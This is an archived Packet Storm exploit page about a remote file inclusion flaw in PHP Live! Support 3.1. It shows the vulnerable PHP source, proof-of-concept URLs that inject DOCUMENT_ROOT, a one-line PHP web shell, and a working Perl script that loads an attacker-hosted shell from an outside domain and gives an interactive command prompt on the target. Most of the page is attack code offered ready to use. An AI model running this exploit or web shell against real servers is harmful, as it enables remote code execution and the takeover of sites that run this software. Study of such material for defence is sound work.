what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

OSI Codes PHP Live! Support 3.1 Remote File Inclusion

OSI Codes PHP Live! Support 3.1 Remote File Inclusion
Posted Nov 23, 2009
Authored by Don Tukulesto | Site indonesiancoder.com

OSI Codes PHP Live! Support version 3.1 suffers from a remote file inclusion vulnerability.

tags | exploit, remote, php, code execution, file inclusion
SHA-256 | 166ca7335c4d46caad48f60ac32d51993582dc6e1440aa04daa5e308c83b1ad7

OSI Codes PHP Live! Support 3.1 Remote File Inclusion

Change Mirror Download
#####
# [»] Author : Don Tukulesto (root@indonesiancoder.com)
# [»] Date : November 23, 2009
# [»] Homepage : http://www.indonesiancoder.com
# [»] Method : Remote File Inclusion
# [»] Location : INDONESIA
# [»] Vendor : http://www.phplivesupport.com/
# [»] Describe : PHP Live! Support v3.1 (c) by OSI Codes Inc.
# Chat with your website visitors with PHP Live!
#
# * Provide Live Support on your Website
# * Increase your Sales
# * Increase Customer Satisfaction
# * Decrease your phone/operational costs
# [»] Usage :
# perl tux.pl <target> <weapon url> cmd
# perl tux.pl http://127.0.0.1/path/ http://www.indonesiancoder.org/shell.txt cmd
# Weapon example: <?php system($_GET['cmd']); ?>
#####
<!--more-->
# [-] Bugs in

[+] index.php
<pre lang="php">
<?php
/*******************************************************
* COPYRIGHT OSI CODES - PHP Live!
*******************************************************/
session_start() ;
$l = "" ;
// try to get cookie value first
if ( isset( $_COOKIE['COOKIE_PHPLIVE_SITE'] ) ) { $l = $_COOKIE['COOKIE_PHPLIVE_SITE'] ; }
if ( isset( $_GET['l'] ) ) { $l = $_GET['l'] ; }
if ( isset( $_POST['l'] ) ) { $l = $_POST['l'] ; }

if ( !file_exists( "./web/conf-init.php" ) )
{
HEADER( "location: setup/index.php" ) ;
exit ;
}

include_once( "./API/Util_Dir.php" ) ;
if ( Util_DIR_CheckDir( ".", $l ) )
include_once("./web/$l/$l-conf-init.php") ;
include_once("./web/conf-init.php") ;
$DOCUMENT_ROOT = realpath( preg_replace( "/http:/", "", $DOCUMENT_ROOT ) ) ;
include_once("$DOCUMENT_ROOT/API/Util_Error.php") ;
include_once("$DOCUMENT_ROOT/system.php") ;
include_once("$DOCUMENT_ROOT/lang_packs/$LANG_PACK.php") ;
include_once("$DOCUMENT_ROOT/web/VERSION_KEEP.php") ;
include_once("$DOCUMENT_ROOT/API/Util_CleanFiles.php") ;
include_once("$DOCUMENT_ROOT/API/sql.php" ) ;
include_once("$DOCUMENT_ROOT/API/Users/get.php") ;
include_once("$DOCUMENT_ROOT/API/Users/update.php") ;
include_once("$DOCUMENT_ROOT/API/Chat/remove.php") ;
include_once("$DOCUMENT_ROOT/API/ASP/get.php") ;

// initialize
$action = $error = $sid = $site = $remember = "" ;
$sound_file = "cellular.wav" ;
$isadmin = $winapp = $autologin = $wflag = $closewin = 0 ;

if ( !isset( $_SESSION['session_admin'] ) )
{
session_register( "session_admin" ) ;
$session_admin = ARRAY() ;
$_SESSION['session_admin'] = ARRAY() ;
}

// check to see if the site login is passes. if not, then let's see how many
// sites are in the asp model. if only ONE, then default to that one.
$total_sites = AdminASP_get_TotalUsers( $dbh ) ;
if ( $total_sites == 1 )
{
$site = AdminASP_get_AllUsers( $dbh, 0, 1 ) ;
$l = $site[0]['login'] ;
}

if ( isset( $LOGO ) && file_exists( "$DOCUMENT_ROOT/web/$l/$LOGO" ) && $LOGO )
$logo = "$BASE_URL/web/$l/$LOGO" ;
else if ( file_exists( "$DOCUMENT_ROOT/web/$LOGO_ASP" ) && $LOGO_ASP )
$logo = "$BASE_URL/web/$LOGO_ASP" ;
else
$logo = "$BASE_URL/images/logo.gif" ;

// get variables
if ( isset( $_POST['action'] ) ) { $action = $_POST['action'] ; }
if ( isset( $_GET['action'] ) ) { $action = $_GET['action'] ; }
if ( isset( $_POST['winapp'] ) ) { $winapp = $_POST['winapp'] ; }
if ( isset( $_GET['winapp'] ) ) { $winapp = $_GET['winapp'] ; }
if ( isset( $_GET['wflag'] ) ) { $wflag = $_GET['wflag'] ; }
if ( isset( $_GET['closewin'] ) && ( $_GET['closewin'] != "undefined" ) ) { $closewin = $_GET['closewin'] ; }

// conditions
if ( ( isset( $_COOKIE['COOKIE_PHPLIVE_LOGIN'] ) && isset( $_COOKIE['COOKIE_PHPLIVE_PASSWORD'] ) && isset( $_COOKIE['COOKIE_PHPLIVE_SITE'] ) ) && !$action )
$autologin = 1 ;

if ( $action == "login" )
{
if ( $l )
$site = $l ;
else
$site = $_POST['site'] ;

$aspinfo = AdminASP_get_ASPInfoByASPLogin( $dbh, $site ) ;
$admin = AdminUsers_get_UserInfoByLoginPass( $dbh, $_POST['login'], $_POST['password'], $aspinfo['aspID'] ) ;

if ( !$aspinfo['active_status'] )
$error = "Servi?o est? inativo. Entre em contato com o administrador para obter detalhes setup." ;
else
{
if ( $admin['userID'] && ( $admin['aspID'] == $aspinfo['aspID'] ) )
{
CleanFiles_util_CleanChatSessionFiles() ;

// set $sid. $sid is used to keep track of this admin user. $sid allows
// so a user can log into several admin departments on same computer. it is
// passed everywhere the admin goes.
$sid = time() ;

$departments = AdminUsers_get_UserDepartments( $dbh, $admin['userID'] ) ;
$dept_string = "" ;
for ( $c = 0; $c < count( $departments ); ++$c )
{
$the_department = $departments[$c] ;
$dept_string .= "deptID = $the_department[deptID] OR " ;
}
$dept_string .= "deptID = 0" ;

$_SESSION['session_admin'][$sid] = ARRAY() ;
$_SESSION['session_admin'][$sid]['dept_string'] = $dept_string ;
$_SESSION['session_admin'][$sid]['admin_id'] = $admin['userID'] ;
$_SESSION['session_admin'][$sid]['requests'] = 0 ;
$_SESSION['session_admin'][$sid]['aspID'] = $aspinfo['aspID'] ;
$_SESSION['session_admin'][$sid]['asp_login'] = $aspinfo['login'] ;
$_SESSION['session_admin'][$sid]['active_footprints'] = 0 ;
$_SESSION['session_admin'][$sid]['winapp'] = "$winapp" ;
$_SESSION['session_admin'][$sid]['close_timer'] = 0 ;
$_SESSION['session_admin'][$sid]['traffic_monitor'] = 0 ;
$_SESSION['session_admin'][$sid]['available_status'] = 1 ;
$_SESSION['session_admin'][$sid]['sound'] = "on" ;
$_SESSION['session_admin'][$sid]['request_ids'] = "" ;
$_SESSION['session_admin'][$sid]['traffic_timer'] = $admin['console_refresh'] ;
$isadmin = 1 ;

// check to see if they want to be remembered... if so, just set cookie.
// let's set it for 1 month for now.
$cookie_lifespan = time() + 60*60*24*30 ;
if ( isset( $_POST['remember'] ) )
{
setcookie( "COOKIE_PHPLIVE_LOGIN", $_POST['login'], $cookie_lifespan ) ;
setcookie( "COOKIE_PHPLIVE_PASSWORD", $_POST['password'], $cookie_lifespan ) ;
setcookie( "COOKIE_PHPLIVE_SITE", $aspinfo['login'], $cookie_lifespan ) ;
}
}
else
{
// reset cookie if cookies are set
if ( isset( $_COOKIE['COOKIE_PHPLIVE_LOGIN'] ) && isset( $_COOKIE['COOKIE_PHPLIVE_PASSWORD'] ) )
{
setcookie( "COOKIE_PHPLIVE_LOGIN", "", -1 ) ;
setcookie( "COOKIE_PHPLIVE_PASSWORD", "", -1 ) ;
setcookie( "COOKIE_PHPLIVE_SITE", "", -1 ) ;
}
$error = "Falha de Login. Nota: sua senha ? (CaSE senSiTiVE)." ;
}
}
}
else if ( $action == "logout" )
{
if ( isset( $_COOKIE['COOKIE_PHPLIVE_LOGIN'] ) && isset( $_COOKIE['COOKIE_PHPLIVE_PASSWORD'] ) && !$wflag )
{
setcookie( "COOKIE_PHPLIVE_LOGIN", "", -1 ) ;
setcookie( "COOKIE_PHPLIVE_PASSWORD", "", -1 ) ;
setcookie( "COOKIE_PHPLIVE_SITE", "", -1 ) ;
}
$sid = $_GET['sid'] ;
$l = $_SESSION['session_admin'][$sid]['asp_login'] ;
AdminUsers_update_Status( $dbh, $_SESSION['session_admin'][$sid]['admin_id'], 0 ) ;
AdminUsers_update_UserValue( $dbh, $_SESSION['session_admin'][$sid]['admin_id'], "last_active_time", $admin_idle - 300 ) ;
$_SESSION['session_admin'] = Array() ;
HEADER( "location: index.php?wflag=$wflag&l=$l&winapp=$winapp&closewin=$closewin" ) ;
exit ;
}
else
{
// do the cleaning of the chat database of old requests and sessions.
ServiceChat_remove_CleanChatSessionList( $dbh ) ;
ServiceChat_remove_CleanChatSessions( $dbh ) ;
ServiceChat_remove_CleanChatRequests( $dbh ) ;
}
?>
</pre>

[+] chat.php
<pre lang="php">
<?php
/*******************************************************
* COPYRIGHT OSI CODES - PHP Live!
*******************************************************/
session_start() ;
$session_chat = $_SESSION['session_chat'] ;
$sid = ( isset( $_GET['sid'] ) ) ? $_GET['sid'] : "" ;
$requestid = ( isset( $_GET['requestid'] ) ) ? $_GET['requestid'] : "" ;
$sessionid = ( isset( $_GET['sessionid'] ) ) ? $_GET['sessionid'] : "" ;
$userid = ( isset( $_GET['userid'] ) ) ? $_GET['userid'] : "" ;
$action = ( isset( $_GET['action'] ) ) ? $_GET['action'] : "" ;
if ( !file_exists( "web/".$session_chat[$sid]['asp_login']."/".$session_chat[$sid]['asp_login']."-conf-init.php" ) || !file_exists( "web/conf-init.php" ) )
{
print "<font color=\"#FF0000\">[Configuration Error: config files not found! -$sid] Exiting...</font>" ;
exit ;
}
include_once("./web/conf-init.php") ;
$DOCUMENT_ROOT = realpath( preg_replace( "/http:/", "", $DOCUMENT_ROOT ) ) ;
include_once("$DOCUMENT_ROOT/web/".$session_chat[$sid]['asp_login']."/".$session_chat[$sid]['asp_login']."-conf-init.php") ;
include_once("$DOCUMENT_ROOT/system.php") ;
include_once("$DOCUMENT_ROOT/lang_packs/$LANG_PACK.php") ;
include_once("$DOCUMENT_ROOT/API/sql.php") ;
include_once("$DOCUMENT_ROOT/API/Chat/update.php") ;


// set frame row properties depending if admin or regular request
$frame_row_properties = "*,100%" ;
if ( $session_chat[$sid]['isadmin'] && $session_chat[$sid]['deptid'] )
$frame_row_properties = "*,100%" ;
// let's start the poll time
$_SESSION['session_chat'][$sid]['admin_poll_time'] = time() ;
$window_title = preg_replace( "/<(.*)>/", "", $session_chat[$sid]['visitor_name'] ) .": Support Request" ;
?>
</pre>

[+] help.php
<pre lang="php">
<?php
/*******************************************************
* COPYRIGHT OSI CODES - PHP Live!
*******************************************************/
include_once("./web/conf-init.php");
$DOCUMENT_ROOT = realpath( preg_replace( "/http:/", "", $DOCUMENT_ROOT ) ) ;
include_once("$DOCUMENT_ROOT/system.php") ;
include_once("$DOCUMENT_ROOT/lang_packs/$LANG_PACK.php") ;
include_once("$DOCUMENT_ROOT/web/VERSION_KEEP.php") ;
include_once("$DOCUMENT_ROOT/API/sql.php") ;

// initialize
$action = "" ;

if ( preg_match( "/(MSIE)|(Gecko)/", $_SERVER['HTTP_USER_AGENT'] ) )
$text_width = "12" ;
else
$text_width = "9" ;

$success = 0 ;
// update all admins status to not available if they have been idle

// get variables
if ( isset( $_POST['action'] ) ) { $action = $_POST['action'] ; }
if ( isset( $_GET['action'] ) ) { $action = $_GET['action'] ; }
?>
</pre>


[-] PoC

http://127.0.0.1/path/index.php?DOCUMENT_ROOT=
http://127.0.0.1/path/chat.php?DOCUMENT_ROOT=
http://127.0.0.1/path/help.php?DOCUMENT_ROOT=

[-] eXpL0!t c0des

<pre lang="perl">
#!/usr/bin/perl

use HTTP::Request;
use LWP::UserAgent;
$RoNz = $ARGV[0];
$Pathloader = $ARGV[1];
$Contrex = $ARGV[2];
if($RoNz!~/http:\/\// || $Pathloader!~/http:\/\// || !$Contrex){usage()}
head();
sub head()
{
print "[o]============================================================================[o]\r\n";
print " | PHP Live! Support v3.1 Multiple Remote File Include |\r\n";
print "[o]============================================================================[o]\r\n";
}
while()
{
print "[w00t] \$";
while(<STDIN>)
{
$kaMtiEz=$_;
chomp($kaMtiEz);
$arianom = LWP::UserAgent->new() or die;
$tiw0L = HTTP::Request->new(GET =>$RoNz.'help.php?DOCUMENT_ROOT='.$Pathloader.'?&'.$Contrex.'='.$kaMtiEz)or die "\nCould Not connect\n";
$abah_benu = $arianom->request($tiw0L);
$tukulesto = $abah_benu->content;
$tukulesto =~ tr/[\n]/[Í]/;
if (!$kaMtiEz) {print "\nPlease Enter a Command\n\n"; $tukulesto ="";}
elsif ($tukulesto =~/failed to open stream: HTTP request denied!/ || $tukulesto =~/: Cannot execute a blank command in /)
{print "\nCann't Connect to cmd Host or Invalid Command\n";exit}
elsif ($tukulesto =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
if($tukulesto =~ /(.*)/)
{
$finreturn = $1;
$finreturn=~ tr/[Í]/[\n]/;
print "\r\n$finreturn\n\r";
last;
}
else {print "[w00t] \$";}}}last;
sub usage()
{
head();
print " | Usage: perl tux.pl <target> <weapon url> <cmd> |\r\n";
print " | <Site> - Full path to execute ex: http://127.0.0.1/path/ |\r\n";
print " | <Weapon url> - Path to Shell e.g http://www.indonesiancoder.org/shell.txt |\r\n";
print " | <cmd> - Command variable used in php shell |\r\n";
print "[o]============================================================================[o]\r\n";
print " | IndonesianCoder Team | KILL-9 CREW | ServerIsDown | AntiSecurity.org |\r\n";
print " | kaMtiEz, M3NW5, arianom, tiw0L, Pathloader, abah_benu, VycOd, Gh4mb4S |\r\n";
print " | M364TR0N, TUCKER, Ian Petrucii, kecemplungkalen, NoGe, bh4nd55, MainHack.Net |\r\n";
print " | Jack-, Contrex, yadoy666, Ronz, noname, s4va, gonzhack, cyb3r_tron, saint |\r\n";
print " | Awan Bejat, Plaque, rey_cute, BennyCooL, SurabayaHackerLink Team and YOU! |\r\n";
print "[o]============================================================================[o]\r\n";
print " | http://www.IndonesianCoder.org | http://www.AntiSecRadio.fm |\r\n";
print "[o]============================================================================[o]\r\n";
exit();
}
</pre>
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close